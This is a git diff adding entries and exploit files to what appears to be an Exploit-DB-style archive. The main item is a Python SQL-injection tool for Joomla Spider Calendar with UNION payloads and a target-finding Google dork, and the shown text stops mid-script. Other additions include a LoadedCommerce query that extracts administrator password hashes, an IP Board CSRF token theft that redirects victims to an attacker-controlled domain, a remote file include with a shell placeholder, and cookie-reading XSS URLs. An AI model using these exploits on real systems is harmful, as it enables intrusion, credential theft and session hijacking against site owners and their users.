diff --git a/files.csv b/files.csv index 9664682b4..c3d14d2b4 100755 --- a/files.csv +++ b/files.csv @@ -30990,6 +30990,7 @@ id,file,description,date,author,platform,type,port 34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart Local File Include and Cross Site Scripting Vulnerabilities",2009-10-08,kl3ryk,php,webapps,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow Vulnerability",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 +34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0 34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - CSRF Vulnerability",2014-08-25,"Rainer Giedat",multiple,webapps,80 34409,platforms/multiple/webapps/34409.rb,"ManageEngine Password Manager MetadataServlet.dat SQL Injection",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020 34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 'group.php' SQL Injection and HTML Injection Vulnerabilities",2010-08-05,skskilL,php,webapps,0 @@ -31065,6 +31066,7 @@ id,file,description,date,author,platform,type,port 34485,platforms/php/webapps/34485.txt,"FreeSchool 'key_words' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0 34486,platforms/php/webapps/34486.txt,"PHPCMS2008 'download.php' Information Disclosure Vulnerability",2009-10-19,Securitylab.ir,php,webapps,0 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0 +34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)",2014-08-31,mr.pr0n,windows,local,0 34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition Multiple Cross Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0 34493,platforms/php/webapps/34493.txt,"PPScript 'shop.htm' SQL Injection Vulnerability",2009-08-03,MizoZ,php,webapps,0 34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 @@ -31084,6 +31086,7 @@ id,file,description,date,author,platform,type,port 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0 34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS Vulnerability",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466 @@ -31094,6 +31097,7 @@ id,file,description,date,author,platform,type,port 34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0 34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 +34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability",2010-08-25,Kolor,windows,webapps,0 34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0 @@ -31104,6 +31108,7 @@ id,file,description,date,author,platform,type,port 34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 +34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80 34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0 @@ -31117,3 +31122,17 @@ id,file,description,date,author,platform,type,port 34548,platforms/php/webapps/34548.txt,"Datemill photo_view.php return Parameter XSS",2009-09-10,Moudi,php,webapps,0 34549,platforms/php/webapps/34549.txt,"Datemill photo_search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0 34550,platforms/php/webapps/34550.txt,"Datemill search.php st Parameter XSS",2009-09-10,Moudi,php,webapps,0 +34551,platforms/php/webapps/34551.txt,"IP Board 3.x - CSRF Token hjiacking",2014-09-07,"Piotr S.",php,webapps,0 +34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory Vulnerability",2014-09-07,Breaking.Technology,php,webapps,0 +34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection Vulnerability",2014-09-07,Att4ck3r.ir,php,webapps,0 +34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - XSS",2014-09-07,"N0 Feel",php,webapps,0 +34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 +34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 +34560,platforms/php/webapps/34560.html,"ArtGK CMS Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 +34561,platforms/php/webapps/34561.txt,"KingCMS 0.6 'CONFIG[AdminPath]' Parameter Remote File Include Vulnerability",2009-09-07,Securitylab.ir,php,webapps,0 +34562,platforms/php/webapps/34562.txt,"AdaptBB 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0 +34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 'index.php' Cross Site Scripting Vulnerability",2010-09-02,anT!-Tr0J4n,php,webapps,0 +34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro 'c.php' SQL Injection Vulnerability",2010-09-02,MustLive,php,webapps,0 +34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 'nusoap.php' Cross Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0 +34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 +34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0 diff --git a/platforms/linux/local/34537.txt b/platforms/linux/local/34537.txt new file mode 100755 index 000000000..fc96cb579 --- /dev/null +++ b/platforms/linux/local/34537.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/42779/info + +EncFS is prone to design errors in its cryptographic implementation. + +Three flaws have been identified that contribute to a weakening of the protections provided under CBC/CFB cipher mode. + +Attackers may leverage these weaknesses to attack encrypted files through watermarking or other techniques. Successful attacks may disclose sensitive information. + +http://www.exploit-db.com/sploits/34537.tar.gz \ No newline at end of file diff --git a/platforms/multiple/webapps/34525.txt b/platforms/multiple/webapps/34525.txt new file mode 100755 index 000000000..d74e4c55c --- /dev/null +++ b/platforms/multiple/webapps/34525.txt @@ -0,0 +1,51 @@ +Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS +Author: Dolev Farhi +Contact: dolevf at yahoo dot com @dolevff +Application: LogAnalyzer 3.6.5 +Date: 8.2.2014 +Relevant CVEs: CVE-2014-6070 +Vulnerable version: <= 3.6.5 +Fixed version: 3.6.6 + +1. About the application +------------------------ +LogAnalyzer is a web interface to syslog and other network event data. +It provides easy browsing, analysis of realtime network events and +reporting services. + + +2. Vulnerabilities Descriptions: +----------------------------- +It was found that an XSS injection is possible on a syslog server +running LogAnalyzer version 3.6.5. +by changing the hostname of any entity logging to syslog server with +LogAnalyzer to , and sending an arbitrary +syslog message, a client-side script injection execution is possible. + + +4. proof of concept exploit +----------------------- +#!/usr/bin/python +# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection +# Date: Sept 2014 +# CVE: 2014-6070 +# Tested on RHEL6.4 + +import os +import syslog + +hostname = os.uname()[1] +payload = "\"\"" + +print("+ Setting temporary hostname to " + payload + "...") +os.system("hostname " + payload) + +print("+ Injecting the syslog message...") +syslog.syslog("syslog xss injection") + +print("+ Check LogAnalyzer dashboard...") + +raw_input("+ Press [enter] to restore hostname...") +os.system("hostname " + "\"" + hostname + "\"") + +print("+ Hostname restored to " + hostname) diff --git a/platforms/php/webapps/34405.txt b/platforms/php/webapps/34405.txt new file mode 100755 index 000000000..7998ec1d1 --- /dev/null +++ b/platforms/php/webapps/34405.txt @@ -0,0 +1,19 @@ +?# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities +in PHP Stock Management System 1.02 +# Date: 25 Aug 2014 +# Exploit Author: ?Ragha Deepthi K R +# Vendor Homepage: ?http://www.posnic.com/? +# Software Link:? http://sourceforge.net/projects/stockmanagement/ +# Version: ?1.02 +# Tested on: Windows 7 + +################################################# +?PHP Stock Management System 1.02? is vulnerable for ?multiple Persistent +Cross Site Scripting Vulnerabilit?ies. +The vulnerability affects 'sname'(Store Name Field), 'address'(Address +Field), 'place'(Place Field), 'city'(City Field), pin(Pin Field), +website(Website Field), email(Email Field) parameter?s? while updating the +?store details in 'update_details.php' and when seen in 'view_report.php' + +################################################# +Greetz :? Syam !? diff --git a/platforms/php/webapps/34551.txt b/platforms/php/webapps/34551.txt new file mode 100755 index 000000000..620bb46b4 --- /dev/null +++ b/platforms/php/webapps/34551.txt @@ -0,0 +1,95 @@ +#Title: IP Board 3.x CSRF - Token hjiacking +#Date: 03.09.14 +#Version: <= 3.4.6 +#Vendor: invisionpower.com +#Author: Piotr S. +#Video-PoC: https://www.youtube.com/watch?v=G5P21TA4DjY + + +1) Introduction + +Latest and propabbly previous IPB verions suffers on vulnerability, which allows attacker to steal CSRF token of specific user. Function, which allows users to share forum links, does not properly sanitize user input. Mentioned token is attached in request as GET parameter, so it's able to obtain it if user will be redirected to evil domain. Using the token, it is able to perform various operations as demonstrated in attached video. + + +2) PoC + +Let's take a closer look at following url: + +http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ== + +At first glance you can notice b64 string, after decoding it, you may see following address: +http://community.invisionpower.com/forum.php?id=2334 + +In this case, user should be redirected to default domain of the forum - community.invisionpower.com; it is able to bypass protection in this redirect, by creating particular subdomain on attacker website. it needs to contain address of victim forum otherwise it won't work. + +Request: +GET /index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS54b3JiLnBsL2V4cGxvaXQuaHRtbA== HTTP/1.1 +Host: community.invisionpower.com + +Response: +302 +Location: http://community.invisionpower.com.xorb.pl/exploit.html?forcePrint=1&_k=161cc4d2d5503fdb483979f9c164b4d3 + +Token is delivered as value of GET _k parameter. File to which user is redirected contains javascript, which grabs token that will be used in CSRF request. + + +3) Reproduction + +a) Create subdomain + +http://forum.victim_site.com.your_domain.pl + + +b) Then, create file exploit.html with this content: + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ +

IP Board 3.X PoC
wait... ;)

+ + + +c) Create payload + +http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2ZvcnVtLnZpY3RpbV9zaXRlLmNvbS55b3VyX2RvbWFpbi5jb20vZXhwbG9pdC5odG1sIw== + +Now send this payload to victim - see video PoC for better understand. + +4) References + + - https://www.youtube.com/watch?v=G5P21TA4DjY + - https://twitter.com/evil_xorb + + +Happy hacking! diff --git a/platforms/php/webapps/34552.txt b/platforms/php/webapps/34552.txt new file mode 100755 index 000000000..4acb93143 --- /dev/null +++ b/platforms/php/webapps/34552.txt @@ -0,0 +1,35 @@ +Title: LoadedCommerce7 Systemic Query Factory Vulnerability + +Credits: Discovered by Breaking Technology Research Labs 2014-06-30 + +Reference: CVE-2014-5140 - Assigned 31 June 2014 + +Timeline: + Vendor notified - 29 July 2014 + Vendor confirmed exploit 30 July 2014 + + +Severity: Critical +Attack Complexity: Minimal +Classification: SQL injection, unsafe string replacement + +Description: + + Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection. + +Proof of Concept: + + Have a valid customer account and create a new contact in your address book using the following values. + + + First name: :entry_lastname, + Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)# + + The new contact will be added to your address book with the admin hash as the contact's street address + +Suggested Fix: + Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value. A similar fix was issued for tomatocart, available at + https://github.com/tomatocart/TomatoCart-v1/pull/238 + + + diff --git a/platforms/php/webapps/34553.txt b/platforms/php/webapps/34553.txt new file mode 100755 index 000000000..9a31f3108 --- /dev/null +++ b/platforms/php/webapps/34553.txt @@ -0,0 +1,82 @@ +################################################################################################# +# +# Title : Wordpress Like Dislike Counter Plugin SQL +Injection Vulnerability +# Risk : High+/Critical +# Exploit Author : XroGuE +# Google Dork : +inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php + AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php +# Plugin Version : 1.2.3 +# Plugin Name : Like Dislike Counter +# Plugin Download Link : +http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip +# Vendor Home : www.wpfruits.com +# Date : 2014/09/05 +# Tested in : Win7 - Linux +# +################################################################################################## +# This Vulnerability Available in Both Version of This Plugin (Free & +Pro Version). +# +# PoC : +# +# +http://localhost/wp/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php +# +# Vulnerable Page : ajax_counter.php +# +# if (!$changedDir)$changedDir = +preg_replace('|wp-content.*$|','',__FILE__); +# include_once($changedDir.'/wp-config.php'); +# if(isset($_COOKIE['ul_post_cnt'])) +# { +# $posts_present=$_COOKIE['ul_post_cnt']; +# } +# else +# { +# $posts_present=array(); +# } +# // Here ------------------------> Inputs Not Filtered ! :| +# $post_id=$_POST['post_id']; +# $up_type=$_POST['up_type']; +# // Here <------------------------ +# if($up_type=='c_like'||$up_type=='c_dislike') +# { +# $for_com='c_'; +# } +# else +# { +# $for_com=''; +# } +# if(!in_array($for_com.$post_id,$posts_present)) +# { +# update_post_ul_meta($post_id,$up_type); +# } +# echo get_post_ul_meta($post_id,$up_type); +# +################################################################################################## +# POST +wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php +HTTP/1.1 +# Host: localhost +# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) +Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21 +# Accept: */* +# Accept-Language: en-US,en;q=0.5 +# Accept-Encoding: gzip, deflate +# Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +# X-Requested-With: XMLHttpRequest +# Referer: http://localhost/wp/ +# Content-Length: 24 +# Connection: keep-alive +# Pragma: no-cache +# Cache-Control: no-cache +# post_id=1&up_type=like +################################################################################################## +# +# Founded By : XroGuE +# Website : http://www.Att4ck3r.ir +# E-Mail : info[at]att4ck3r[Dot]ir +# +################################################################################################## diff --git a/platforms/php/webapps/34555.txt b/platforms/php/webapps/34555.txt new file mode 100755 index 000000000..24d1e0217 --- /dev/null +++ b/platforms/php/webapps/34555.txt @@ -0,0 +1,18 @@ +# Exploit Title: [phponlinechat xss ] +# Date: [5/9/2014] +# Exploit Author: [N0 Feel] +# Vendor Homepage: [http://phponlinechat.com/phpchat] +# Software Link: [http://phponlinechat.com/chat-free-download.php] +# Version: [3.0] +# Tested on: [win7] + +php online chat suffer from xss in user panel + +- register as user +- go to : http://path/phpchat/canned_opr.php +- inject javascript evil code into messae filed + +demo : +http://phponlinechat.com/phpchat/canned_opr.php + +have fun :) diff --git a/platforms/php/webapps/34558.txt b/platforms/php/webapps/34558.txt new file mode 100755 index 000000000..6892b1719 --- /dev/null +++ b/platforms/php/webapps/34558.txt @@ -0,0 +1,116 @@ +source: http://www.securityfocus.com/bid/42908/info + +Amiro.CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Amiro.CMS 5.8.4.0 is vulnerable; other versions may also be affected. + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + diff --git a/platforms/php/webapps/34559.txt b/platforms/php/webapps/34559.txt new file mode 100755 index 000000000..9824be06c --- /dev/null +++ b/platforms/php/webapps/34559.txt @@ -0,0 +1,40 @@ +source: http://www.securityfocus.com/bid/42914/info + +Rumba XML is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Rumba XML 2.4 is vulnerable; other versions may also be affected. + +
+ + + +' /> + + +
+ + + +
+ + + + + +' /> + + + + + + + + +
+ diff --git a/platforms/php/webapps/34560.html b/platforms/php/webapps/34560.html new file mode 100755 index 000000000..86479c12f --- /dev/null +++ b/platforms/php/webapps/34560.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/42923/info + +ArtGK CMS is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +
\ No newline at end of file diff --git a/platforms/php/webapps/34561.txt b/platforms/php/webapps/34561.txt new file mode 100755 index 000000000..947324dad --- /dev/null +++ b/platforms/php/webapps/34561.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/42924/info + +KingCMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +KingCMS 0.6.0 is vulnerable; other versions may be affected. + +http://www.example.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/34562.txt b/platforms/php/webapps/34562.txt new file mode 100755 index 000000000..826908e7c --- /dev/null +++ b/platforms/php/webapps/34562.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/42930/info + +AdaptBB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +AdaptBB 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?do=search&q=PUUUUKE%22%27%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&x=0&y=0 \ No newline at end of file diff --git a/platforms/php/webapps/34563.txt b/platforms/php/webapps/34563.txt new file mode 100755 index 000000000..7882a035e --- /dev/null +++ b/platforms/php/webapps/34563.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/42949/info + +OneCMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +OneCMS version 2.6.1 is vulnerable; others may also be affected. + +http://www.example.com/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34564.txt b/platforms/php/webapps/34564.txt new file mode 100755 index 000000000..d9dd7efa4 --- /dev/null +++ b/platforms/php/webapps/34564.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/42951/info + +CMS WebManager-Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/c.php?id=1%20and%20version()=5 \ No newline at end of file diff --git a/platforms/php/webapps/34565.txt b/platforms/php/webapps/34565.txt new file mode 100755 index 000000000..74cee004b --- /dev/null +++ b/platforms/php/webapps/34565.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/42959/info + +NuSOAP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +NuSOAP 0.9.5 is vulnerable; other versions may be affected. + +http://www.example.com/filename.php/1%3CScRiPt%3Eprompt(923395)%3C/ScRiPt%3E" \ No newline at end of file diff --git a/platforms/php/webapps/34571.py b/platforms/php/webapps/34571.py new file mode 100755 index 000000000..89df24063 --- /dev/null +++ b/platforms/php/webapps/34571.py @@ -0,0 +1,308 @@ +#!/usr/bin/env python +# +# +# Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection +# +# Exploit Author : Claudio Viviani +# +# Vendor Homepage : http://web-dorado.com/ +# +# Software Link : http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329 +# +# Dork Google: inurl:option=com_spidercalendar +# +# Date : 2014-08-31 +# +# Tested on : Windows 7 / Mozilla Firefox +# Linux / Mozilla Firefox +# +# +# +###################### +# +# PoC Exploit: +# +# http://localhost/joomla/index.php?option=com_spidercalendar&calendar_id=1 [SQLi] +# +# +# "calendar_id" and "calendar" variables are not sanitized. +# +# +# Vulnerability Disclosure Timeline: +# +# 2014-08-31: Discovered vulnerability +# 2014-09-04: Vendor Notification +# 2014-09-05: Vendor Response/Feedback +# 2014-09-05: Vendor Fix/Patch +# 2014-09-05: Public Disclosure + +import codecs +import httplib +import re +import sys +import socket +import optparse + +banner = """ + + $$$$$\ $$\ $$$$$$\ $$\ $$\ + \__$$ | $$ | $$ __$$\ \__| $$ | + $$ | $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ | $$$$$$\ $$ / \__| $$$$$$\ $$\ $$$$$$$ | $$$$$$\ $$$$$$\ + $$ |$$ __$$\ $$ __$$\ $$ _$$ _$$\ $$ | \____$$\ \$$$$$$\ $$ __$$\ $$ |$$ __$$ |$$ __$$\ $$ __$$\ +$$\ $$ |$$ / $$ |$$ / $$ |$$ / $$ / $$ |$$ | $$$$$$$ | \____$$\ $$ / $$ |$$ |$$ / $$ |$$$$$$$$ |$$ | \__| +$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ |$$ __$$ | $$\ $$ |$$ | $$ |$$ |$$ | $$ |$$ ____|$$ | +\$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | $$ |$$ |\$$$$$$$ | \$$$$$$ |$$$$$$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$ | + \______/ \______/ \______/ \__| \__| \__|\__| \_______| \______/ $$ ____/ \__| \_______| \_______|\__| + $$ | + $$ | + \__| + + $$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\ + $$ __$$\ $$ | $$ | $$ ___$$\ $$ __$$\ $$ __$$\ + $$ / \__| $$$$$$\ $$ | $$$$$$\ $$$$$$$\ $$$$$$$ | $$$$$$\ $$$$$$\ \_/ $$ | \__/ $$ | $$ / \__| + $$ | \____$$\ $$ |$$ __$$\ $$ __$$\ $$ __$$ | \____$$\ $$ __$$\ $$$$$ / $$$$$$ | $$$$$$$\ + $$ | $$$$$$$ |$$ |$$$$$$$$ |$$ | $$ |$$ / $$ | $$$$$$$ |$$ | \__| \___$$\ $$ ____/ $$ __$$\ + $$ | $$\ $$ __$$ |$$ |$$ ____|$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$\ $$ | $$ | $$ / $$ | + \$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ $$ | $$ |\$$$$$$$ |\$$$$$$$ |$$ | \$$$$$$ |$$\ $$$$$$$$\ $$\ $$$$$$ | + \______/ \_______|\__| \_______|\__| \__| \_______| \_______|\__| \______/ \__|\________|\__|\______/ + + j00ml4 Spid3r C4l3nd4r >= 2.x <= 3.2.6 SQLi + + Written by: + + Claudio Viviani + + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +""" + +C0mm4nds = dict() +C0mm4nds['DB VERS'] = 'VERSION' +C0mm4nds['DB NAME'] = 'DATABASE' +C0mm4nds['DB USER'] = 'CURRENT_USER' + +com_spidercalendar = "index.php?option=com_spidercalendar&calendar_id=1" +ver_spidercalendar = "administrator/components/com_spidercalendar/spidercalendar.xml" +vuln = 0 + +def cmdMySQL(cmd): + SqlInjList = [ + # SQLi Spider Calendar 2.x + '%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23', + # SQLi Spider Calendar 3.0 + '%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23', + # SQLi Spider Calendar 3.2.x + '%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23', + ] + return SqlInjList + +def checkProtocol(pr): + + parsedHost = "" + PORT = m_oOptions.port + + if pr[0:8] == "https://": + parsedHost = pr[8:] + + if parsedHost.endswith("/"): + parsedHost = parsedHost.replace("/","") + if PORT == 0: + PORT = 443 + + PROTO = httplib.HTTPSConnection(parsedHost, PORT) + + elif pr[0:7] == "http://": + parsedHost = pr[7:] + if parsedHost.endswith("/"): + parsedHost = parsedHost.replace("/","") + if PORT == 0: + PORT = 80 + + PROTO = httplib.HTTPConnection(parsedHost, PORT) + + else: + parsedHost = pr + + if parsedHost.endswith("/"): + parsedHost = parsedHost.replace("/","") + if PORT == 0: + PORT = 80 + + PROTO = httplib.HTTPConnection(parsedHost, PORT) + + return PROTO, parsedHost + +def connection(addr, url_string): + + parsedHost = checkProtocol(addr)[1] + PROTO = checkProtocol(addr)[0] + try: + socket.gethostbyname(parsedHost) + + except socket.gaierror: + print 'Hostname could not be resolved. Exiting' + sys.exit() + + connection_req = checkProtocol(addr)[0] + + try: + connection_req.request('GET', url_string) + except socket.error: + print('Connection Error') + sys.exit(1) + + response = connection_req.getresponse() + reader = codecs.getreader("utf-8")(response) + + return {'response':response, 